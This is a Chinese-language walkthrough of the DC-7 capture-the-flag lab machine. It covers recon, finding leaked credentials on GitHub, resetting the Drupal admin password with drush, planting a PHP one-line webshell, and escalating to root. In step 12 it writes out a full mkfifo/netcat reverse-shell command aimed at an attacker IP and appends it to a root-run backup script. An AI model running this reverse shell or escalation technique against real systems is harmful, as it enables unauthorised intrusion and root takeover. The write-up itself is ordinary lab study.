继续渗透DC-7! 冲!
1.发现主机192.168.174.158
2.照例nmap扫描,22和80端口都开着呢。
3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。
记住下面的DC7USER,要考!!
然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。
4.想扫目录来着,扫了好久都没扫完,就算了。
5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹
6.没有思路,瞎捣鼓一通之后,得到大佬博客指点,还记得上面的考点吗?切入点就是@DC7USER,我是注意到了就是没在意。信息收集不到位。百度一下DC7USER,就有个GitHub地址。
7.在config.php中发现了username和password。
8.然后通过ssh登录,查看家目录
9.cat mbox,有root发来的邮件,subject是一个定时任务,定时备份,后面跟着脚本路径。
进到目录下可以看到的是 backups.sh是以root用户执行的,但是www-data也有读写权限。
分析一下脚本
大概是在做些站点备份啥的吧。
gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码
drush user-password admin --password="12345" 改变admin的密码
然后进行登录。
10.想找个地方反弹shell,/node/add/page在创建basic page 并没有php模块,说是Drupal 8后为了安全,需要将php单独作为一个模块导入。找到模块导入的地址
地址奉上https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
添加之后还要去激活!!
这样就可以使用啦。
11.然后写个一句话木马,用蚁剑连接,反弹shell到Kali
12. echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh
用vi好像不太行,不知道为啥
再次反弹shell到kali,等待backups.sh执行完毕后,因为backups.sh是以root执行的,kali也就获得了root权限。
总结
我觉得作者所说的“new concept”是让我们在渗透的过程中可以尝试从社工的角度出发??就是不要局限于网站的功能点的漏洞上。这只是我 个人理解。还学到了在以root权限执行的backups.sh脚本,不仅可以利用!/bin/bash提权,还可以利用反弹shell,利用方式是多种多样的,还是得靠脑洞的经验。